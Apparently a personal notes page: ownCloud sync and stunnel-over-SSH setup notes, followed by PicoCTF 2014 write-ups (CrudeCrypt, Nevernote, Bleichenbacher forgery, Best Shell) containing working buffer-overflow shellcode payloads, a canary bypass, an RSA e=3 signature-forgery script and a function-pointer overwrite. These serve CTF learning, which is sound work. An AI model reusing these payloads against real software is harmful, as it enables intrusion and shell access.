# ownCloud files synchronization (copy)


ownCloud commandline client

# wget http://download.opensuse.org/repositories/isv:ownCloud:desktop/xUbuntu_14.04/Release.key
# apt-key add - < Release.key
# echo 'deb http://download.opensuse.org/repositories/isv:/ownCloud:/desktop/xUbuntu_14.04/ /' >> /etc/apt/sources.list.d/owncloud-client.list
# apt-get update
# apt-get install owncloud-client
# owncloudcmd -h
# mkdir data
# cat sync.sh
#!/bin/bash

user="username"
password="password"
local_dir="/data"
hostname="remotehost"
path="dir/subdir"
server_url="https://$hostname/remote.php/webdav/$path"

owncloudcmd \
--silent \
--trust \
--user $user \
--password $password \
$local_dir \
$server_url

# ./sync.sh

WebDAV file system

# apt-get install davfs2
# cat mount_davfs.sh
#!/bin/bash

user="username"
password="password"
local_dir="/data"
hostname="remotehost"
path="dir/subdir"
server_url="https://$hostname/remote.php/webdav/$path"

echo -e "$user\n$password\ny" | mount.davfs $server_url $local_dir

# ./mount_davfs.sh
# ls -l /data

Reference

https://owncloud.org/install/#install-clients

# Tunnel SSH connections over TLS


Server

# apt-get install stunnel4
# openssl genrsa 1024 > stunnel.key
# openssl req -new -key stunnel.key -x509 -days 1000 -out stunnel.crt
# cat stunnel.crt stunnel.key > stunnel.pem
# mv stunnel.pem /etc/stunnel/.
# cat /etc/stunnel/stunnel.conf
pid  = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem

[ssh]
accept  = 1.2.3.4:443
connect = 127.0.0.1:22
# cat /etc/default/stunnel4 | grep ENABLED
ENABLED=1
# service stunnel4 start

Client

# apt-get install stunnel4
# cat /etc/stunnel/stunnel.conf
pid  = /var/run/stunnel.pid
client = yes

[ssh]
accept  = 127.0.0.1:22443
connect = 1.2.3.4:443
# cat /etc/default/stunnel4 | grep ENABLED
ENABLED=1
# service stunnel4 start
# ssh -p 22443 localhost

# PicoCTF 2k14 - CrudeCrypt


# cd /home/crudecrypt
# cat crude_crypt.c 
...

bool check_hostname(file_header* header) {
    char saved_host[HOST_LEN], current_host[HOST_LEN];
    strncpy(saved_host, header->host, strlen(header->host));
    safe_gethostname(current_host, HOST_LEN);
    return strcmp(saved_host, current_host) == 0;
}

...
# echo 'test' > ~/plain.txt
$ ./crude_crypt encrypt ~/plain.txt ~/encrypted.txt
-=- Welcome to CrudeCrypt 0.1 Beta -=-
-> File password: test

=> Encrypted file successfully

# gdb ./crude_crypt
(gdb) disassemble check_hostname
   0x08048e03 <+0>: push   ebp
   0x08048e04 <+1>: mov    ebp,esp
   0x08048e06 <+3>: sub    esp,0x58
   0x08048e09 <+6>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048e0c <+9>: add    eax,0x8
   0x08048e0f <+12>: mov    DWORD PTR [esp],eax
   0x08048e12 <+15>: call   0x80488f0 <strlen@plt>
   0x08048e17 <+20>: mov    edx,DWORD PTR [ebp+0x8]
   0x08048e1a <+23>: add    edx,0x8
   0x08048e1d <+26>: mov    DWORD PTR [esp+0x8],eax
   0x08048e21 <+30>: mov    DWORD PTR [esp+0x4],edx
   0x08048e25 <+34>: lea    eax,[ebp-0x28]
   0x08048e28 <+37>: mov    DWORD PTR [esp],eax
   0x08048e2b <+40>: call   0x8048840 <strncpy@plt>
   0x08048e30 <+45>: mov    DWORD PTR [esp+0x4],0x20
   0x08048e38 <+53>: lea    eax,[ebp-0x48]
   0x08048e3b <+56>: mov    DWORD PTR [esp],eax
   0x08048e3e <+59>: call   0x8048b09 <safe_gethostname>
   0x08048e43 <+64>: lea    eax,[ebp-0x48]
   0x08048e46 <+67>: mov    DWORD PTR [esp+0x4],eax
   0x08048e4a <+71>: lea    eax,[ebp-0x28]
   0x08048e4d <+74>: mov    DWORD PTR [esp],eax
   0x08048e50 <+77>: call   0x80489a0 <strcmp@plt>
   0x08048e55 <+82>: test   eax,eax
   0x08048e57 <+84>: sete   al
   0x08048e5a <+87>: leave  
   0x08048e5b <+88>: ret

(gdb) b *0x08048e2b

(gdb) run decrypt ~/encrypted.txt ~/decrypted.txt
Starting program: /home/crudecrypt/crude_crypt decrypt ~/encrypted.txt ~/decrypted.txt
-=- Welcome to CrudeCrypt 0.1 Beta -=-
-> File password: test

Breakpoint 1, 0x08048e2b in check_hostname ()

(gdb) bt
#0  0x08048e2b in check_hostname ()
#1  0x08048f0e in decrypt_file ()
#2  0x08049154 in main ()

(gdb) x/24xw $esp
0xffffd4b0: 0xffffd4e0 0x0804c368 0x00000005 0x00000000
0xffffd4c0: 0xffffd508 0xf7ff0500 0xf7de8428 0xf7de8000
0xffffd4d0: 0x00000000 0x00000000 0xffffd508 0x08048c8d
0xffffd4e0: 0x0804c398 0x0804c360 0x00000030 0x0804925d
0xffffd4f0: 0xffffd548 0xf7ff0500 0x00000010 0x0804c398
0xffffd500: 0x00000000 0x00000000 0xffffd548 0x08048f0e

# cat ~/crude_xplt.c
...

void encrypt_file(FILE* raw_file, FILE* enc_file, unsigned char* key, char *offset) {
    int size = file_size(raw_file);
    size_t block_size = MULT_BLOCK_SIZE(sizeof(file_header) + size);
    char* padded_block = calloc(1, block_size);

    file_header header;
    init_file_header(&header, size);

    char *shellcode = "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
 
    int sc_sz = strlen(shellcode);
    int nops_sz = 48 - sc_sz - 4;

    memcpy(header.host, shellcode, sc_sz);
    memset(header.host + sc_sz, 0x90, nops_sz);
    memcpy(header.host + sc_sz + nops_sz, offset, 4);
    
    memcpy(padded_block, &header, sizeof(file_header));
    fread(padded_block + sizeof(file_header), 1, size, raw_file);

    if(encrypt_buffer(padded_block, block_size, (char*)key, 16) != 0) {
        printf("There was an error encrypting the file!\n");
        return;
    }

    printf("=> Encrypted file successfully\n");
    fwrite(padded_block, 1, block_size, enc_file);

    free(padded_block);
}

...
# gcc -m32 -std=c99 -o ~/crude_xplt ~/crude_xplt.c -lmcrypt -lcrypto
# ~/crude_xplt ~/plain.txt ~/encrypted.txt `python -c 'print "\xe0\xd4\xff\xff"'`
=> Encrypted file successfully
# (echo "test"; cat) | ./crude_crypt decrypt ~/encrypted.txt  ~/decrypted.txt
-=- Welcome to CrudeCrypt 0.1 Beta -=-
-> File password:
cat flag.txt
writing_software_is_hard

[ * ] Done by sha0 and t0n1

# PicoCTF 2k14 - Nevernote


# cd /home/nevernote
# cat nevernote.c
...
bool get_note(char *dest){
    struct safe_buffer temporary;
    bool valid;

    get_canary(&temporary.can);

    printf("Write your note: ");
    fflush(stdout);
    fgets(temporary.buf, NOTE_SIZE, stdin);

    // disallow some characters
    if (strchr(temporary.buf, '\t') || strchr(temporary.buf, '\r')){
        valid = false;
    }else{
        valid = true;
        strncpy(dest, temporary.buf, NOTE_SIZE); 0x0804c050, 0xffffd334
    }

    verify_canary(&temporary.can);

    return valid;
}
...

# cat canary.h
#define SAFE_BUFFER_SIZE 512

struct canary{
    int canary;
    int *verify;
};

/* buffer overflow resistant buffer */
struct safe_buffer{
    char buf[SAFE_BUFFER_SIZE];
    struct canary can;
};
...

buffer(512) + canary + verify + padding + ret + dest
canary = buffer[0:4]
verify = dest
ret = temporarybuf

# (python -c 'import struct; nop = "\x90"; sc = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; buffer = nop*4 + sc + nop*(512 - 4 - len(sc)); canary = buffer[0:4]; dest = struct.pack("<I", 0x0804c050); verify = dest; padding = nop*16; temporarybuf = struct.pack("<I", 0xffffd334); ret = temporarybuf; print "user\na\n" + buffer + canary + verify + padding + ret + dest'; cat) | ./nevernote
Please enter your name: Enter a command: Write your note:
cat flag.txt
the_hairy_canary_fairy_is_still_very_wary

# PicoCTF 2k14 - Revenge of the Bleichenbacher


# cat bleichenbacher_attack.py 
import gmpy
import hashlib
import sys

# '0001ffffffffff' + '00' + hash + garbage

cmd = sys.argv[1]
sha1 = hashlib.sha1(cmd)
hash = sha1.hexdigest()

padding = '0001ffffffffff'
garbage = 'f' * (768 - len(padding) - 2 - len(hash))
data = padding + '00' + hash + garbage

print data, len(data)

number = gmpy.mpz(int(data, 16))

print cmd, hex(number.root(3)[0])[2:]

# python bleichenbacher_attack.py list
0001ffffffffff0038b62be4bddaa5661c7d6b8e36e28159314df5c7ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 768
list 7fffffffffeaaf6483a8619ae8009d52df3e7921d7819d9d62870b544568abce57f39fa2a74369d54d0ba30926901871ae72ed82a787a5cbbc728c77520bbd360ed07857d0078023e808efd3f815bcfacec62b8d3f18e49ac3743e023aec9bbe80fec3f97b1b90542951c0945b5a14683689da03b422e2ca462c2cf3241964e

# python bleichenbacher_attack.py cat
0001ffffffffff009d989e8d27dc9e0ec3389fc855f142c3d40f0c50ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 768
cat 7fffffffffeab7ccb7e1151dde4920716e7822264ba7031df08d0e85877dfc3f377d52361f9ece607ef63b4c3db72a38509511a9bab8e99fe564d63cc8c83c63d019166d207e83dcdefba0e287bb47915a11999baec3b3612cfd6604220387529d776cf1a1cdbf85e77821786f8102eab3207435dffdab0ac0012bb2541c2d3

# nc vuln2014.picoctf.com 4919
list 7fffffffffeaaf6483a8619ae8009d52df3e7921d7819d9d62870b544568abce57f39fa2a74369d54d0ba30926901871ae72ed82a787a5cbbc728c77520bbd360ed07857d0078023e808efd3f815bcfacec62b8d3f18e49ac3743e023aec9bbe80fec3f97b1b90542951c0945b5a14683689da03b422e2ca462c2cf3241964e
Please enter which directory you'd like to list in (enter '.' for current directory).
.
CommandServer.jar
.profile
flag
.bashrc
.bash_logout
cat 7fffffffffeab7ccb7e1151dde4920716e7822264ba7031df08d0e85877dfc3f377d52361f9ece607ef63b4c3db72a38509511a9bab8e99fe564d63cc8c83c63d019166d207e83dcdefba0e287bb47915a11999baec3b3612cfd6604220387529d776cf1a1cdbf85e77821786f8102eab3207435dffdab0ac0012bb2541c2d3
Please enter which file you'd like to read.
flag
arent_signature_forgeries_just_great

Reference

https://web.archive.org/web/20150315062111/http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html

# PicoCTF 2k14 - Best Shell


$ cat best_shell.c 
...

typedef struct input_handler {
    char cmd[32];
    void (*handler)(char *);
} input_handler;

...

void rename_handler(char *arg){
    char *existing;
    char *new;

    if (arg == NULL){
        printf("usage: rename [cmd_name] [new_name]\n");
        return;
    }

    existing = strtok(arg, " ");
    new = strtok(NULL, "");

    if (new == NULL){
        printf("usage: rename [cmd_name] [new_name]\n");
        return;
    }

    input_handler *found = find_handler(existing);

    if (found != NULL){
        strcpy(found->cmd, new);
    }else{
        printf("No command found.\n");
    }
}

...

void shell_handler(char *arg){
    if (admin){
        gid_t gid = getegid();
        setresgid(gid, gid, gid);
        system("/bin/sh");
    }else{
        printf("You must be admin!\n");
    }
}

...
$ gdb ./best_shell 
(gdb) disassemble setup_handlers
   0x08048a14 <+0>: push   ebp
   0x08048a15 <+1>: mov    ebp,esp
   0x08048a17 <+3>: push   ebx
   0x08048a18 <+4>: mov    DWORD PTR ds:0x804b0e0,0x6c656873
   0x08048a22 <+14>: mov    DWORD PTR ds:0x804b0e4,0x6c
   0x08048a2c <+24>: mov    edx,0x804b0e8
   0x08048a31 <+29>: mov    ecx,0x0
   0x08048a36 <+34>: mov    eax,0x18
   0x08048a3b <+39>: and    eax,0xfffffffc
   0x08048a3e <+42>: mov    ebx,eax
   0x08048a40 <+44>: mov    eax,0x0
   0x08048a45 <+49>: mov    DWORD PTR [edx+eax*1],ecx
   0x08048a48 <+52>: add    eax,0x4
   0x08048a4b <+55>: cmp    eax,ebx
   0x08048a4d <+57>: jb     0x8048a45 <setup_handlers+49>
   0x08048a4f <+59>: add    edx,eax
   0x08048a51 <+61>: mov    DWORD PTR ds:0x804b100,0x80489c6

(gdb) x/10i 0x80489c6
   0x80489c6 <shell_handler>: push   ebp
   0x80489c7 <shell_handler+1>: mov    ebp,esp
   0x80489c9 <shell_handler+3>: sub    esp,0x28
   0x80489cc <shell_handler+6>: movzx  eax,BYTE PTR ds:0x804b085
   0x80489d3 <shell_handler+13>: test   al,al
   0x80489d5 <shell_handler+15>: je     0x8048a06 <shell_handler+64>
   0x80489d7 <shell_handler+17>: call   0x8048600 <getegid@plt>
   0x80489dc <shell_handler+22>: mov    DWORD PTR [ebp-0xc],eax
   0x80489df <shell_handler+25>: mov    eax,DWORD PTR [ebp-0xc]
   0x80489e2 <shell_handler+28>: mov    DWORD PTR [esp+0x8],eax

$ (python -c 'import struct; payload = "A"*32 + struct.pack("<I", 0x080489d7); print "rename shell " + payload + "\n" + payload'; cat) | ./best_shell
>> >> cat flag.txt
give_shell_was_useful